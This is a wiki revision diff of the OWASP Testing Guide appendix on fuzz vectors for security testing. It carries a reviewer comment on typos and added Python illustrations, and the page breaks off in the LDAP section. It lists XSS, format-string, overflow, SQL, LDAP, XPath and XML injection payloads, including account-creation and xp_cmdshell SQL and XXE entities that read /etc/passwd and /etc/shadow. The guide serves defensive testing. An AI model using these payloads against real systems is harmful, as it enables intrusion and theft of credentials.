Difference between revisions of "OWASP Testing Guide Appendix C: Fuzz Vectors"
(Final edit)
(61 intermediate revisions by 10 users not shown)
Line 1: | Line 1: | ||
− | {{Template:OWASP Testing Guide}} | + | {{Template:OWASP Testing Guide v4}} |
− | The following are fuzzing vectors which can be used with | + | |
− | Fuzzing is the "kitchen sink" approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing. | + | |
− | This is the simple part of the discovery phase. | + | The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], [[ZAP]] or another fuzzer. |
− | Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required: | + | Fuzzing is the "kitchen sink" approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing. This is the simple part of the discovery phase. Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required. |
+ | |||
+ | |||
+ | === Fuzz Categories === | ||
+ | |||
+ | In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist: | ||
+ | |||
+ | * Recursive fuzzing | ||
+ | * Replacive fuzzing | ||
+ | |||
+ | |||
+ | We examine and define each category in the sub-sections that follow. | ||
+ | |||
+ | |||
+ | ==== Recursive fuzzing ==== | ||
+ | |||
+ | Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of: | ||
+ | |||
+ | <pre> | ||
+ | <nowiki>http://www.example.com/8302fa3b</nowiki> | ||
+ | </pre> | ||
+ | |||
+ | Selecting "8302fa3b" as a part of the request to be fuzzed against the set hexadecimal alphabet (i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f}) falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form: | ||
+ | <pre> | ||
+ | <nowiki>http://www.example.com/00000000</nowiki> | ||
+ | <nowiki>...</nowiki> | ||
+ | <nowiki>http://www.example.com/11000fff</nowiki> | ||
+ | <nowiki>...</nowiki> | ||
+ | <nowiki>http://www.example.com/ffffffff</nowiki> | ||
+ | </pre> | ||
+ | |||
+ | |||
+ | ==== Replacive fuzzing ==== | ||
+ | |||
+ | Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of: | ||
+ | |||
+ | <pre> | ||
+ | <nowiki>http://www.example.com/8302fa3b</nowiki> | ||
+ | </pre> | ||
+ | |||
+ | |||
+ | Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: | ||
+ | |||
+ | <pre> | ||
+ | <nowiki>http://www.example.com/>"><script>alert("XSS")</script>&</nowiki> | ||
+ | <nowiki>http://www.example.com/'';!--"<XSS>=&{()}</nowiki> | ||
+ | </pre> | ||
+ | |||
+ | This is a form of replacive fuzzing. In this category, the total number of requests is dependent on the number of fuzz vectors specified. | ||
+ | |||
+ | |||
+ | The remainder of this appendix presents a number of fuzz vector categories. | ||
+ | |||
+ | |||
+ | === Cross Site Scripting (XSS) === | ||
+ | |||
+ | For details on XSS: [[Cross-site Scripting (XSS)]] | ||
+ | |||
+ | <nowiki>>"><script>alert("XSS")</script>&</nowiki> | ||
+ | <nowiki>"><STYLE>@import"javascript:alert('XSS')";</STYLE></nowiki> | ||
+ | <nowiki>>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a; | ||
+ | alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)></nowiki><br> | ||
+ | <nowiki>>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22></nowiki> | ||
+ | <nowiki>'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'</nowiki> | ||
+ | <nowiki>"></nowiki> | ||
+ | <nowiki>>"</nowiki> | ||
+ | <nowiki>'';!--"<XSS>=&{()}</nowiki> | ||
+ | <nowiki><IMG SRC="javascript:alert('XSS');"></nowiki> | ||
+ | <nowiki><IMG SRC=javascript:alert('XSS')></nowiki> | ||
+ | <nowiki><IMG SRC=JaVaScRiPt:alert('XSS')> </nowiki> | ||
+ | <nowiki><IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)></nowiki> | ||
+ | <nowiki><IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97; | ||
+ | &#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41></nowiki> | ||
+ | <nowiki><IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t: | ||
+ | &<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')></nowiki><br> | ||
+ | <nowiki><IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert( | ||
+ | &<WBR>#x27XSS')></nowiki><br> | ||
+ | <nowiki><IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');"></nowiki> | ||
+ | <nowiki><IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"></nowiki> | ||
+ | <nowiki><IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"></nowiki> | ||
+ | |||
+ | |||
+ | === Buffer Overflows and Format String Errors === | ||
+ | |||
+ | ==== Buffer Overflows (BFO) ==== | ||
+ | A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory. | ||
+ | |||
+ | |||
+ | For details on Buffer Overflows: [[Testing for Buffer Overflow (OWASP-DV-014) | Testing for Buffer Overflow ]] | ||
+ | |||
+ | |||
+ | Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash. | ||
+ | |||
+ | <nowiki>A x 5</nowiki> | ||
+ | <nowiki>A x 17</nowiki> | ||
+ | <nowiki>A x 33</nowiki> | ||
+ | <nowiki>A x 65</nowiki> | ||
+ | <nowiki>A x 129</nowiki> | ||
+ | <nowiki>A x 257</nowiki> | ||
+ | <nowiki>A x 513</nowiki> | ||
+ | <nowiki>A x 1024</nowiki> | ||
+ | <nowiki>A x 2049</nowiki> | ||
+ | <nowiki>A x 4097</nowiki> | ||
+ | <nowiki>A x 8193</nowiki> | ||
+ | <nowiki>A x 12288</nowiki> | ||
+ | |||
+ | |||
+ | ==== Format String Errors (FSE) ==== | ||
+ | |||
+ | Format string attacks are a class of vulnerabilities that involve supplying language specific format tokens to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input. | ||
+ | |||
+ | |||
+ | An excellent introduction on FSE can be found in the USENIX paper entitled: [http://research.microsoft.com/pubs/74359/01-shankar.pdfl Detecting Format String Vulnerabilities with Type Qualifiers] | ||
+ | |||
+ | |||
+ | Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash. | ||
+ | |||
+ | <nowiki>%s%p%x%d</nowiki> | ||
+ | <nowiki>.1024d</nowiki> | ||
+ | <nowiki>%.2049d</nowiki> | ||
+ | <nowiki>%p%p%p%p</nowiki> | ||
+ | <nowiki>%x%x%x%x</nowiki> | ||
+ | <nowiki>%d%d%d%d</nowiki> | ||
+ | <nowiki>%s%s%s%s</nowiki> | ||
+ | <nowiki>%99999999999s</nowiki> | ||
+ | <nowiki>%08x</nowiki> | ||
+ | <nowiki>%%20d</nowiki> | ||
+ | <nowiki>%%20n</nowiki> | ||
+ | <nowiki>%%20x</nowiki> | ||
+ | <nowiki>%%20s</nowiki> | ||
+ | <nowiki>%s%s%s%s%s%s%s%s%s%s</nowiki> | ||
+ | <nowiki>%p%p%p%p%p%p%p%p%p%p</nowiki> | ||
+ | <nowiki>%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%</nowiki> | ||
+ | <nowiki>%s x 129</nowiki> | ||
+ | <nowiki>%x x 257</nowiki> | ||
+ | |||
+ | |||
+ | ==== Integer Overflows (INT) ==== | ||
+ | |||
+ | Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value. If a tester can cause the program to perform such a memory allocation, the program can be potentially vulnerable to a buffer overflow attack. | ||
+ | |||
+ | <nowiki>-1</nowiki> | ||
+ | <nowiki>0</nowiki> | ||
+ | <nowiki>0x100</nowiki> | ||
+ | <nowiki>0x1000</nowiki> | ||
+ | <nowiki>0x3fffffff</nowiki> | ||
+ | <nowiki>0x7ffffffe</nowiki> | ||
+ | <nowiki>0x7fffffff</nowiki> | ||
+ | <nowiki>0x80000000</nowiki> | ||
+ | <nowiki>0xfffffffe</nowiki> | ||
+ | <nowiki>0xffffffff</nowiki> | ||
+ | <nowiki>0x10000</nowiki> | ||
+ | <nowiki>0x100000</nowiki> | ||
+ | |||
+ | |||
+ | === SQL Injection === | ||
+ | |||
+ | This attack can affect the database layer of an application and is typically present when user input is not filtered for SQL statements. | ||
+ | |||
+ | |||
+ | For details on Testing SQL Injection: [[Testing for SQL Injection (OWASP-DV-005)|Testing for SQL Injection]] | ||
+ | |||
+ | |||
+ | SQL Injection is classified in the following two categories, depending on the exposure of database information (passive) or the alteration of database information (active). | ||
+ | |||
+ | * Passive SQL Injection | ||
+ | * Active SQL Injection | ||
+ | |||
+ | |||
+ | Active SQL Injection statements can have a detrimental effect on the underlying database if successfully executed. | ||
+ | |||
+ | |||
+ | ==== Passive SQL Injection (SQP) ==== | ||
+ | |||
+ | <nowiki>'||(elt(-3+5,bin(15),ord(10),hex(char(45))))</nowiki> | ||
+ | <nowiki>||6</nowiki> | ||
+ | <nowiki>'||'6</nowiki> | ||
+ | <nowiki>(||6)</nowiki> | ||
+ | <nowiki>' OR 1=1--</nowiki> | ||
+ | <nowiki>OR 1=1</nowiki> | ||
+ | <nowiki>' OR '1'='1</nowiki> | ||
+ | <nowiki>; OR '1'='1'</nowiki> | ||
+ | <nowiki>%22+or+isnull%281%2F0%29+%2F*</nowiki> | ||
+ | <nowiki>%27+OR+%277659%27%3D%277659</nowiki> | ||
+ | <nowiki>%22+or+isnull%281%2F0%29+%2F*</nowiki> | ||
+ | <nowiki>%27+--+</nowiki> | ||
+ | <nowiki>' or 1=1--</nowiki> | ||
+ | <nowiki>" or 1=1--</nowiki> | ||
+ | <nowiki>' or 1=1 /*</nowiki> | ||
+ | <nowiki>or 1=1--</nowiki> | ||
+ | <nowiki>' or 'a'='a</nowiki> | ||
+ | <nowiki>" or "a"="a</nowiki> | ||
+ | <nowiki>') or ('a'='a</nowiki> | ||
+ | <nowiki>Admin' OR '</nowiki> | ||
+ | <nowiki>'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--</nowiki> | ||
+ | <nowiki>) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;</nowiki> | ||
+ | <nowiki>' having 1=1--</nowiki> | ||
+ | <nowiki>' having 1=1--</nowiki> | ||
+ | <nowiki>' group by userid having 1=1--</nowiki> | ||
+ | <nowiki>' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--</nowiki> | ||
+ | <nowiki>' or 1 in (select @@version)--</nowiki> | ||
+ | <nowiki>' union all select @@version--</nowiki> | ||
+ | <nowiki>' OR 'unusual' = 'unusual'</nowiki> | ||
+ | <nowiki>' OR 'something' = 'some'+'thing'</nowiki> | ||
+ | <nowiki>' OR 'text' = N'text'</nowiki> | ||
+ | <nowiki>' OR 'something' like 'some%'</nowiki> | ||
+ | <nowiki>' OR 2 > 1</nowiki> | ||
+ | <nowiki>' OR 'text' > 't'</nowiki> | ||
+ | <nowiki>' OR 'whatever' in ('whatever')</nowiki> | ||
+ | <nowiki>' OR 2 BETWEEN 1 and 3</nowiki> | ||
+ | <nowiki>' or username like char(37);</nowiki> | ||
+ | <nowiki>' union select * from users where login = char(114,111,111,116);</nowiki> | ||
+ | <nowiki>' union select </nowiki> | ||
+ | <nowiki>Password:*/=1--</nowiki> | ||
+ | <nowiki>UNI/**/ON SEL/**/ECT</nowiki> | ||
+ | <nowiki>'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'</nowiki> | ||
+ | <nowiki>'; EXEC ('SEL' + 'ECT US' + 'ER')</nowiki> | ||
+ | <nowiki>'/**/OR/**/1/**/=/**/1</nowiki> | ||
+ | <nowiki>' or 1/*</nowiki> | ||
+ | <nowiki>+or+isnull%281%2F0%29+%2F*</nowiki> | ||
+ | <nowiki>%27+OR+%277659%27%3D%277659</nowiki> | ||
+ | <nowiki>%22+or+isnull%281%2F0%29+%2F*</nowiki> | ||
+ | <nowiki>%27+--+&password=</nowiki> | ||
+ | <nowiki>'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > | ||
+ | @var select @var as var into temp end --</nowiki><br> | ||
+ | <nowiki>' and 1 in (select var from temp)--</nowiki> | ||
+ | <nowiki>' union select 1,load_file('/etc/passwd'),1,1,1;</nowiki> | ||
+ | <nowiki>1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;</nowiki> | ||
+ | <nowiki>' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));</nowiki> | ||
+ | |||
+ | |||
+ | ==== Active SQL Injection (SQI) ==== | ||
+ | |||
+ | <nowiki>'; exec master..xp_cmdshell 'ping 10.10.1.2'--</nowiki> | ||
+ | <nowiki>CREATE USER name IDENTIFIED BY 'pass123'</nowiki> | ||
+ | <nowiki>CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; </nowiki> | ||
+ | <nowiki>' ; drop table temp --</nowiki> | ||
+ | <nowiki>exec sp_addlogin 'name' , 'password'</nowiki> | ||
+ | <nowiki>exec sp_addsrvrolemember 'name' , 'sysadmin'</nowiki> | ||
+ | <nowiki>INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))</nowiki> | ||
+ | <nowiki>GRANT CONNECT TO name; GRANT RESOURCE TO name;</nowiki> | ||
+ | <nowiki>INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) | ||
+ | + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)</nowiki> | ||
+ | |||
+ | |||
+ | === LDAP Injection === | ||
+ | |||
+ | For details on LDAP Injection: [[Testing for LDAP Injection (OWASP-DV-006)|Testing for LDAP Injection]] | ||
+ | |||
+ | <nowiki>|</nowiki> | ||
+ | <nowiki>!</nowiki> | ||
+ | <nowiki>(</nowiki> | ||
+ | <nowiki>)</nowiki> | ||
+ | <nowiki>%28</nowiki> | ||
+ | <nowiki>%29</nowiki> | ||
+ | <nowiki>&</nowiki> | ||
+ | <nowiki>%26</nowiki> | ||
+ | <nowiki>%21</nowiki> | ||
+ | <nowiki>%7C</nowiki> | ||
+ | <nowiki>*|</nowiki> | ||
+ | <nowiki>%2A%7C</nowiki> | ||
+ | <nowiki>*(|(mail=*))</nowiki> | ||
+ | <nowiki>%2A%28%7C%28mail%3D%2A%29%29</nowiki> | ||
+ | <nowiki>*(|(objectclass=*))</nowiki> | ||
+ | <nowiki>%2A%28%7C%28objectclass%3D%2A%29%29</nowiki> | ||
+ | <nowiki>*()|%26'</nowiki> | ||
+ | <nowiki>admin*</nowiki> | ||
+ | <nowiki>admin*)((|userPassword=*)</nowiki> | ||
+ | <nowiki>*)(uid=*))(|(uid=*</nowiki> | ||
+ | |||
+ | |||
+ | === XPATH Injection === | ||
+ | |||
+ | For details on XPATH Injection: [[Testing for XPath Injection (OWASP-DV-010)|Testing for XPath Injection]] | ||
+ | |||
+ | <nowiki>'+or+'1'='1</nowiki> | ||
+ | <nowiki>'+or+''='</nowiki> | ||
+ | <nowiki>x'+or+1=1+or+'x'='y</nowiki> | ||
+ | <nowiki>/</nowiki> | ||
+ | <nowiki>//</nowiki> | ||
+ | <nowiki>//*</nowiki> | ||
+ | <nowiki>*/*</nowiki> | ||
+ | <nowiki>@*</nowiki> | ||
+ | <nowiki>count(/child::node())</nowiki> | ||
+ | <nowiki>x'+or+name()='username'+or+'x'='y</nowiki> | ||
+ | |||
+ | |||
+ | === XML Injection === | ||
+ | |||
+ | Details on XML Injection here: [[Testing for XML Injection (OWASP-DV-008)|Testing for XML Injection]] | ||
+ | |||
+ | <nowiki><![CDATA[<script>var n=0;while(true){n++;}</script>]]></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo></nowiki> |
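Review bot: several of the added vectors contain typos that make them inert as written and should be corrected before this page is used as a fuzzer definition file. In the XML Injection block the four XXE entries declare `<!ENTITY xxe ...>` but reference `&xee;`, so the entity is never expanded; the third entry closes `<foo>` with `</foof>`, which looks like a typo rather than the intended test input. In Format String Errors, `.1024d` is missing its leading `%`, and the USENIX link ends in `.pdfl` instead of `.pdf`. The Passive SQL Injection list repeats `' having 1=1--` and `%22+or+isnull%281%2F0%29+%2F*` verbatim. Finally, the vector lines sit inside `<nowiki>` with no `<br>` between them (only a few entries have one), so the rendered page runs every vector in a section together on a single line, and the entries that are wrapped across two source lines (the entity-encoded `<IMGSRC=...>` ones, the `begin declare @var ...` statement) render with an embedded space; wrapping each block in `<pre>` as the Fuzz Categories examples do would keep one vector per line.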
Latest revision as of 10:17, 14 May 2014
This article is part of the new OWASP Testing Guide v4.
The following are fuzzing vectors which can be used with WebScarab, JBroFuzz, WSFuzzer, ZAP or another fuzzer.
Fuzzing is the "kitchen sink" approach to testing the response of an application to parameter manipulation. Generally, one looks for error conditions that are generated in an application as a result of fuzzing. This is the simple part of the discovery phase. Once an error has been discovered, identifying and exploiting a potential vulnerability is where skill is required.
Fuzz Categories
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:
- Recursive fuzzing
- Replacive fuzzing
We examine and define each category in the sub-sections that follow.
Recursive fuzzing
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:
http://www.example.com/8302fa3b
Selecting "8302fa3b" as a part of the request to be fuzzed against the set hexadecimal alphabet (i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f}) falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:
http://www.example.com/00000000
...
http://www.example.com/11000fff
...
http://www.example.com/ffffffff
Replacive fuzzing
Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:
http://www.example.com/8302fa3b
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors:
http://www.example.com/>"><script>alert("XSS")</script>& http://www.example.com/'';!--"<XSS>=&{()}
This is a form of replacive fuzzing. In this category, the total number of requests is dependent on the number of fuzz vectors specified.
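The two categories above as generators, added here as an illustration and not taken from the OWASP appendix or any of the fuzzers it names. The URL template and the two XSS vectors are the ones quoted on this page; the function names are ours. The recursive generator streams candidates rather than materialising all 16^8 strings, and candidate_at computes the n-th candidate directly so a large run can be sampled or resumed.

```python
# Added example: recursive vs. replacive fuzz candidate generation.
from itertools import product
from typing import Iterator, Sequence

HEX_ALPHABET = "0123456789abcdef"
TEMPLATE = "http://www.example.com/{}"          # "{}" marks the fuzzed part
XSS_VECTORS = ['>"><script>alert("XSS")</script>&', "'';!--\"<XSS>=&{()}"]


def recursive_candidates(alphabet: str, length: int) -> Iterator[str]:
    """Every string of `length` symbols over `alphabet`, in lexical order."""
    for combo in product(alphabet, repeat=length):
        yield "".join(combo)


def recursive_count(alphabet: str, length: int) -> int:
    """Requests a recursive run will generate: |alphabet| ** length."""
    return len(alphabet) ** length


def candidate_at(alphabet: str, length: int, index: int) -> str:
    """The index-th candidate without enumerating the ones before it.

    The candidate is just `index` written in base |alphabet|, zero-padded
    to `length`, which is what makes resuming or sampling a run cheap.
    """
    if not 0 <= index < recursive_count(alphabet, length):
        raise IndexError("index outside the candidate space")
    base = len(alphabet)
    digits = []
    for _ in range(length):
        index, digit = divmod(index, base)
        digits.append(alphabet[digit])
    return "".join(reversed(digits))


def replacive_candidates(vectors: Sequence[str]) -> Iterator[str]:
    """One request per fuzz vector: the count is len(vectors), not |alphabet|**n."""
    yield from vectors


def build_requests(template: str, candidates) -> Iterator[str]:
    """Splice each candidate into the fuzzed part of the request."""
    for value in candidates:
        yield template.format(value)


if __name__ == "__main__":
    # Recursive: the 8-hex-digit path segment from the page costs 16**8 requests.
    print(recursive_count(HEX_ALPHABET, 8))
    print(candidate_at(HEX_ALPHABET, 8, 0x11000FFF))
    # Replacive: exactly one request per vector.
    for url in build_requests(TEMPLATE, replacive_candidates(XSS_VECTORS)):
        print(url)
```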
The remainder of this appendix presents a number of fuzz vector categories.
Cross Site Scripting (XSS)
For details on XSS: Cross-site Scripting (XSS)
>"><script>alert("XSS")</script>&
"><STYLE>@import"javascript:alert('XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
">
>"
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>
<IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
Buffer Overflows and Format String Errors
Buffer Overflows (BFO)
A buffer overflow or memory corruption attack is a programming condition which allows valid data to overflow beyond its preallocated storage limit in memory.
For details on Buffer Overflows: Testing for Buffer Overflow
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.
A x 5
A x 17
A x 33
A x 65
A x 129
A x 257
A x 513
A x 1024
A x 2049
A x 4097
A x 8193
A x 12288
Format String Errors (FSE)
Format string attacks are a class of vulnerabilities that involve supplying language-specific format tokens to execute arbitrary code or crash a program. The objective of fuzzing for such errors is to check for unfiltered user input.
An excellent introduction to FSE can be found in the USENIX paper entitled: Detecting Format String Vulnerabilities with Type Qualifiers
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.
%s%p%x%d
.1024d
%.2049d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%%20d
%%20n
%%20x
%%20s
%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
%s x 129
%x x 257
Integer Overflows (INT)
Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value. If a tester can cause the program to use such an overflowed quantity as the size of a memory allocation, the program can be potentially vulnerable to a buffer overflow attack.
-1
0
0x100
0x1000
0x3fffffff
0x7ffffffe
0x7fffffff
0x80000000
0xfffffffe
0xffffffff
0x10000
0x100000
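Why the INT vectors sit at those particular values, as an added illustration that is not part of the OWASP appendix. It models a program that computes an allocation size as count * element_size in 32-bit arithmetic: for the larger vectors the product wraps, a small buffer is allocated, and the program then writes `count` elements into it. The vector list is the page's; the function names and the element size of 4 are our assumptions, and checked_alloc_size is the guard a defender would add.

```python
# Added example: 32-bit wrap in an allocation-size computation, and the
# check that prevents it. Vectors are the INT list from this page.
UINT32_MAX = 0xFFFFFFFF
INT_VECTORS = ["-1", "0", "0x100", "0x1000", "0x3fffffff", "0x7ffffffe",
               "0x7fffffff", "0x80000000", "0xfffffffe", "0xffffffff",
               "0x10000", "0x100000"]


def to_u32(token: str) -> int:
    """Parse a vector the way a C cast to a 32-bit unsigned would: -1 -> 0xffffffff."""
    return int(token, 0) & UINT32_MAX


def unchecked_alloc_size(count: int, elem_size: int) -> int:
    """The vulnerable computation: count * elem_size truncated to 32 bits."""
    return (count * elem_size) & UINT32_MAX


def checked_alloc_size(count: int, elem_size: int):
    """The fix: refuse any count whose product would not fit in 32 bits."""
    if elem_size == 0 or count > UINT32_MAX // elem_size:
        return None          # reject the request instead of wrapping
    return count * elem_size


def wraps32(count: int, elem_size: int) -> bool:
    """True when the 32-bit product is smaller than the mathematically true one."""
    return unchecked_alloc_size(count, elem_size) != count * elem_size


def triage(vectors, elem_size: int) -> dict:
    """Per vector: (true size, what the unchecked code allocates, wrapped?)."""
    out = {}
    for v in vectors:
        n = to_u32(v)
        out[v] = (n * elem_size, unchecked_alloc_size(n, elem_size),
                  wraps32(n, elem_size))
    return out


if __name__ == "__main__":
    # With 4-byte elements, 0x3fffffff is the last count that does not wrap;
    # 0x7fffffff wraps to 0xfffffffc and 0x80000000 wraps all the way to 0.
    for vec, (true_size, allocated, wrapped) in triage(INT_VECTORS, 4).items():
        flag = "WRAPS" if wrapped else "ok"
        print(f"{vec:>12}  true={true_size:#x}  allocated={allocated:#x}  {flag}")
```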
SQL Injection
This attack can affect the database layer of an application and is typically present when user input is not filtered for SQL statements.
For details on Testing SQL Injection: Testing for SQL Injection
SQL Injection is classified into the following two categories, depending on whether database information is exposed (passive) or altered (active).
- Passive SQL Injection
- Active SQL Injection
Active SQL Injection statements can have a detrimental effect on the underlying database if successfully executed.
Passive SQL Injection (SQP)
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
'||'6
(||6)
' OR 1=1--
OR 1=1
' OR '1'='1
; OR '1'='1'
%22+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Admin' OR '
'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
' having 1=1--
' having 1=1--
' group by userid having 1=1--
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--
' or 1 in (select @@version)--
' union all select @@version--
' OR 'unusual' = 'unusual'
' OR 'something' = 'some'+'thing'
' OR 'text' = N'text'
' OR 'something' like 'some%'
' OR 2 > 1
' OR 'text' > 't'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
' union select * from users where login = char(114,111,111,116);
' union select 
Password:*/=1--
UNI/**/ON SEL/**/ECT
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
'; EXEC ('SEL' + 'ECT US' + 'ER')
'/**/OR/**/1/**/=/**/1
' or 1/*
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+&password=
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' union select 1,load_file('/etc/passwd'),1,1,1;
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
Active SQL Injection (SQI)
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
CREATE USER name IDENTIFIED BY 'pass123'
CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
' ; drop table temp --
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
GRANT CONNECT TO name; GRANT RESOURCE TO name;
INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
LDAP Injection
For details on LDAP Injection: Testing for LDAP Injection
|
!
(
)
%28
%29
&
%26
%21
%7C
*|
%2A%7C
*(|(mail=*))
